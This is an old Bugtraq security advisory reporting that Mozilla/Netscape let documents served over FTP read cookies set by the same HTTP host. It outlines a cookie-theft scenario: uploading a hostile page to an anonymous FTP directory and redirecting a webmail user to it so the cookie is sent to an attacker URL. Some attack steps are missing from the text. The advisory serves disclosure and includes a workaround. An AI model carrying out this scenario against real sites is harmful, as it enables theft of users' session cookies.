Hello bugtraq,
Article below describes a vulnerability that can be treated
as either software vulnerability or specific server
configuration problem depending on your point of view.
Many servers on Internet are affected by this problem
though.
Topic: accessing cookies via ftp
Affected Software: all versions of Netscape/Mozilla
Author: 3APA3A <[email protected]>
Risk: Low
Remotely Exploitable: Yes
Impact: depending on server configuration
cookie set by server can be
retrieved by hostile side from
client
Vendor URL: http://www.mozilla.org
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories
Description:
Mozilla doesn't store information about protocol used to
receive cookie and allows cookie to be handled in documents
received via FTP. This allows document located on FTP site
to access cookie, if it was set by same HTTP site. Since FTP
doesn't allow virtual servers and some ftp sites allow
anonymous document upload it causes danger of unauthorized
access to cookies. Probably secure cookies set via secured
protocol are not affected by this problem. Internet Explorer
probably is not affected.
Details:
Attack is possible in next conditions:
Example of attack scenario:
http://webmail.example.com uses cookie to store user's
account information. There is also ftp://ftp.example.com
with /incoming directory allowing anonymous access
physically located on the same host 192.168.1.1. In this
case ftp://webmail.example.com/incoming can be accessed
anonymously for writing (attack is also possible if
webmail.example.com and ftp.example.com are located on
different hosts, but webmail.example.com sets cookie for
example.com domain as many servers do).
He downloads this document to
ftp://ftp.example.com/incoming
3. He sends e-mail with redirect to
ftp://webmail.example.com/incoming/malware.html to
webmail.example.com user (for example it can be <META
REFRESH> tag)
4. Then user opens message he is redirected to malware.html
which sends user's cookie to URL specified by attacker.
In case there is no anonymous access to FTP, but attacker
has FTP account he can use URL
ftp://account:[email protected]/incoming/malware.html
Additional Information:
See: http://bugzilla.mozilla.org/show_bug.cgi?id=90644
Workaround:
Disable /incoming for your FTP site if your WEB site (or
co-located sites) use cookies with private information.
–
http://www.security.nnov.ru
/\_/\
{ . . } |\
±-oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
±------------o66o–+ /
|/
You know my name - look up my number (The Beatles)